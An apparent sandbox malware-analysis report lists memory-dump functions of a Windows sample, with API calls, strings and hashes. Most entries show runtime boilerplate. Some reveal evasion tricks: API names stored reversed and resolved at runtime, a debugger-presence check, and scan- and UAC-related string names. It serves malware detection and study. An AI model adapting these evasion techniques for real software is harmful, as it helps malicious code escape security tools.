                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 481472006-0
                                                                                              • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                              • Instruction ID: 0c979fdf733421107f31b663709d68e470cf4d18ff1feb824de92923a4e0bd3f
                                                                                              • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                              • Instruction Fuzzy Hash: EAA0124440497042854073180C0253430405C20920FC8874468F8442D0EA2D45208093
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 031CD29D
                                                                                                • Part of subcall function 031CD268: GetProcAddress.KERNEL32(00000000), ref: 031CD281
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                              • API String ID: 1646373207-1918263038
                                                                                              • Opcode ID: 8e33663388d31ef81cbae8aef5f224c0b9800d59c0a2cc8b6ff099485b969955
                                                                                              • Instruction ID: 2f7b2250d49163ad2232322bfed39d7a9717f9275d427e5f4e9fc7668560535a
                                                                                              • Opcode Fuzzy Hash: 8e33663388d31ef81cbae8aef5f224c0b9800d59c0a2cc8b6ff099485b969955
                                                                                              • Instruction Fuzzy Hash: 44415F696783CC5B9204FB6D7604426F7E9D66DA143A0823EB424AB784DB30FC538669
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 031D6EDE
                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 031D6EEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 031D6EFF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 031D6F0F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 031D6F1F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 031D6F2F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 031D6F3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                              • API String ID: 667068680-2233174745
                                                                                              • Opcode ID: d44ac31da967b7d4833ba25c2eb9fdce15cf4a967d3179dea4632f5e956815a6
                                                                                              • Instruction ID: 0c098b713c96e9bbfe6d9f2808b293c921bfed7a356cb5ccf00df01ab651192a
                                                                                              • Opcode Fuzzy Hash: d44ac31da967b7d4833ba25c2eb9fdce15cf4a967d3179dea4632f5e956815a6
                                                                                              • Instruction Fuzzy Hash: 9CF0ACE46587D07FEA04FBB05C9186E2758A97D5053482C1DA8165D547E776A8408730
                                                                                              APIs
                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 031C28CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                              • API String ID: 2030045667-32948583
                                                                                              • Opcode ID: 10ea347480903c10a3fc500986f11b984c729f95da482b55d67345060613237e
                                                                                              • Instruction ID: 51174c9435e9af95bb7adebaab9d56c17cda6b9f004092fbbe34ab5bf58d34c6
                                                                                              • Opcode Fuzzy Hash: 10ea347480903c10a3fc500986f11b984c729f95da482b55d67345060613237e
                                                                                              • Instruction Fuzzy Hash: 87A1C734A143E48FDF21EA2CCC84BD9B6E4EB2D650F1448E9D549AB242CF7589C7CB51
                                                                                              Strings
                                                                                              • An unexpected memory leak has occurred. , xrefs: 031C2690
                                                                                              • The unexpected small block leaks are:, xrefs: 031C2707
                                                                                              • Unexpected Memory Leak, xrefs: 031C28C0
                                                                                              • , xrefs: 031C2814
                                                                                              • bytes: , xrefs: 031C275D
                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 031C2849
                                                                                              • 7, xrefs: 031C26A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                              • API String ID: 0-2723507874
                                                                                              • Opcode ID: 9a284a0fe48d95b5df20f711e9a8fdf1c61a430529b30f13b91a547df2338b17
                                                                                              • Instruction ID: 4c6f596c0cdaaabf0cac38ee9d5f295ecf64ff474ebd48d4804df7e31ddd38b8
                                                                                              • Opcode Fuzzy Hash: 9a284a0fe48d95b5df20f711e9a8fdf1c61a430529b30f13b91a547df2338b17
                                                                                              • Instruction Fuzzy Hash: D071A434A143E88FDF21EA2CCC84BD8BAF5EB2D600F1448E9D549AB241DF7589C6CB51
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,031CC08B,?,?,00000000,00000000), ref: 031CBDF6
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread
                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 4232894706-2493093252
                                                                                              • Opcode ID: c2473a18e5fa4faf934e0957ffae34228c55418f9e75be08d153c88f9b4d0d65
                                                                                              • Instruction ID: 328fbe105d9450832bc07295081b0c75dfb8c38b17c09837217ad0eb29548891
                                                                                              • Opcode Fuzzy Hash: c2473a18e5fa4faf934e0957ffae34228c55418f9e75be08d153c88f9b4d0d65
                                                                                              • Instruction Fuzzy Hash: D1615078B243CC9BCB06EBA5E85069E77B6AFAC700F50843DA101AF645CB35DD1A8791
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DB000
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 031DB017
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DB0AB
                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 031DB0B7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 031DB0CB
                                                                                              Similarity
                                                                                              • API ID: Read$HandleModule
                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                              • API String ID: 2226866862-113032527
                                                                                              • Opcode ID: ef5f4eca0ef2e29f5789144f4887a7b4cb2d117f650fa4bedd15a44042c63058
                                                                                              • Instruction ID: 96897d65a14adc6e6b277c2e55f7bb141efbde0337b8ae7b936b206bbc454093
                                                                                              • Opcode Fuzzy Hash: ef5f4eca0ef2e29f5789144f4887a7b4cb2d117f650fa4bedd15a44042c63058
                                                                                              • Instruction Fuzzy Hash: 34317475A08305BBDF20DB69DC85F5A77BCAF0E354F058154FA25AB2C1D730A940C7A0
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8,?,?,031EE7A8,031C65B1,031ED30D), ref: 031C4395
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8,?,?,031EE7A8,031C65B1,031ED30D), ref: 031C439B
                                                                                              • GetStdHandle.KERNEL32(000000F5,031C43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8), ref: 031C43B0
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,031C43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?), ref: 031C43B6
                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 031C43D4
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$Message
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 1570097196-2970929446
                                                                                              • Opcode ID: 6ad9b2753904523e4c67fc0882918b41aec758fc2002581f9357136876647e0c
                                                                                              • Instruction ID: d35eec6592a6fb2de844444dc98b3e0631cf9a22e8d3288c1546742383d59347
                                                                                              • Opcode Fuzzy Hash: 6ad9b2753904523e4c67fc0882918b41aec758fc2002581f9357136876647e0c
                                                                                              • Instruction Fuzzy Hash: B4F09669AE83D47FF711F2B16C5AF59265C57ACB26F54421DB2205C0C68BA880C4D372
                                                                                              APIs
                                                                                                • Part of subcall function 031CAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                                • Part of subcall function 031CAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                                • Part of subcall function 031CAD3C: GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                                • Part of subcall function 031CAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              • CharToOemA.USER32(?,?), ref: 031CAEFB
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 031CAF18
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF1E
                                                                                              • GetStdHandle.KERNEL32(000000F4,031CAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF33
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,031CAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF39
                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 031CAF5B
                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 031CAF71
                                                                                              Similarity
                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 185507032-0
                                                                                              • Opcode ID: 62789e227a759f7b639bb31cf62b78413e281dc4d5281186ff23fa9ebf5d9b78
                                                                                              • Instruction ID: eaf89982b41f726b99e482089291aeb992c34e85c611bd45a1419c429bc9eada
                                                                                              • Opcode Fuzzy Hash: 62789e227a759f7b639bb31cf62b78413e281dc4d5281186ff23fa9ebf5d9b78
                                                                                              • Instruction Fuzzy Hash: 4E119ABA124384BFD301F7A4DC85F9F77ACAF29A00F444929B744DA0E0DB74E8008762
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031CE625
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031CE641
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 031CE67A
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031CE6F7
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 031CE710
                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 031CE745
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction ID: ff0c040ec4677f3c7ee7ed3da34690aa9a90fa5578322e9f621cad934b7a4aef
                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction Fuzzy Hash: 5551FF7992166D9BCB26DB58CC90BD9B3BCAF5C301F0441D9E509EB211D730AF858FA1
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C35BA
                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,031C3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C35ED
                                                                                              • RegCloseKey.ADVAPI32(?,031C3610,00000000,?,00000004,00000000,031C3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C3603
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                              • API String ID: 3677997916-4173385793
                                                                                              • Opcode ID: c283b4d40622388525c702a8846f5db66556650ad6a1723d553a02c1a4a954c8
                                                                                              • Instruction ID: 0e307755ca225827f24d4070549aed222efe3f92ea02623f6185eedab928345f
                                                                                              • Opcode Fuzzy Hash: c283b4d40622388525c702a8846f5db66556650ad6a1723d553a02c1a4a954c8
                                                                                              • Instruction Fuzzy Hash: 5201F57DA60398BFDB10EBD08C02BBD73ECD71CB11F104469BA10DA681E378A610D668
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                              • API String ID: 667068680-1372893251
                                                                                              • Opcode ID: b1817bec6a20900413a2db85fed9eb7cda29a523e4ef49f727b5d023101f449c
                                                                                              • Instruction ID: 47ae24749148bd6b6ec6fd7395825da08839505174e355ad501800e4560fef26
                                                                                              • Opcode Fuzzy Hash: b1817bec6a20900413a2db85fed9eb7cda29a523e4ef49f727b5d023101f449c
                                                                                              • Instruction Fuzzy Hash: 4D01A27C614348BFDB15EFA9EC51E9DBBBDEB4DE00F518464B814DB601EB30A900C624
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031CAAE7,?,?,00000000), ref: 031CAA68
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,031CAAE7,?,?,00000000), ref: 031CAA98
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 031CAAA3
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,031CAAE7,?,?,00000000), ref: 031CAAC1
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 031CAACC
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                              • String ID:
                                                                                              • API String ID: 4102113445-0
                                                                                              • Opcode ID: 1cd5196df913057144816cde41c7966ec64f6d957e76752753a2f5674cfdd34f
                                                                                              • Instruction ID: e867317558dbbaa6b39acb5929a56157743ecd092e9f0ed4b80503365e28be84
                                                                                              • Opcode Fuzzy Hash: 1cd5196df913057144816cde41c7966ec64f6d957e76752753a2f5674cfdd34f
                                                                                              • Instruction Fuzzy Hash: 4401F2B86303CC7FE713EA74CD12B6E726CDFAEB14F510568E510AA6C1DB65DE008269
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031CACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 031CAB2F
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread
                                                                                              • String ID: eeee$ggg$yyyy
                                                                                              • API String ID: 4232894706-1253427255
                                                                                              • Opcode ID: bddf9f1d572199473bdf5fd1bcab033efa76364a5c1a56d44a12602cef106d70
                                                                                              • Instruction ID: 790036cac0035c28d34fd56edf72719d0a65de63b3946728805f404efaf198db
                                                                                              • Opcode Fuzzy Hash: bddf9f1d572199473bdf5fd1bcab033efa76364a5c1a56d44a12602cef106d70
                                                                                              • Instruction Fuzzy Hash: 1141D0686383CC4BD717EBBD88A12BEB2AADFBD100B15416DD452CB344DB249D028269
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                              • API String ID: 1883125708-1952140341
                                                                                              • Opcode ID: 7e3d4326eeb398ac620edaa5cd3e4277e1ce93b99f6db3d643f8254e9f6da7d9
                                                                                              • Instruction ID: 00f80d92845e2a3ed2408915c848f32e444c660fd83d13a5e3bdcf2c5eff272d
                                                                                              • Opcode Fuzzy Hash: 7e3d4326eeb398ac620edaa5cd3e4277e1ce93b99f6db3d643f8254e9f6da7d9
                                                                                              • Instruction Fuzzy Hash: D0F09078618B44AFCB01FFA9EC15D5DBBECEB4FA00B518465B820DB611EB30AE00C665
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,031DFAEB,UacInitialize,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize), ref: 031DF6EE
                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031DF700
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                              • API String ID: 1646373207-2367923768
                                                                                              • Opcode ID: a07b5f5912d50953bf4ce72de5eeec884444ccb16f0a02fe56b587b4ab123132
                                                                                              • Instruction ID: fca1305eb2e98d131c85e23d6683f02cd74bf494c8ab80242e7e1b4ccd6ff4f2
                                                                                              • Opcode Fuzzy Hash: a07b5f5912d50953bf4ce72de5eeec884444ccb16f0a02fe56b587b4ab123132
                                                                                              • Instruction Fuzzy Hash: AFD012E63603A02FDE00F2F82CC589D0288896E42E3282F20B033CA093E7A68A1B5114
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,031ED10B,00000000,031ED11E), ref: 031CC47A
                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 031CC48B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                              • API String ID: 1646373207-3712701948
                                                                                              • Opcode ID: b1c462538387a35b264945284a4bc0f097213a1b218a4bdc51c5cb18e794e830
                                                                                              • Instruction ID: 44dc0a25614216279447aca8a980a9a62cc73a22123613e048c6fb41c82a1d91
                                                                                              • Opcode Fuzzy Hash: b1c462538387a35b264945284a4bc0f097213a1b218a4bdc51c5cb18e794e830
                                                                                              • Instruction Fuzzy Hash: 7AD05EB06203D45FD600FAF55481AB52198873CB11B08C02DF4265D101E7A75C418FF4
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031CE297
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031CE2B3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031CE32A
                                                                                              • VariantClear.OLEAUT32(?), ref: 031CE353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
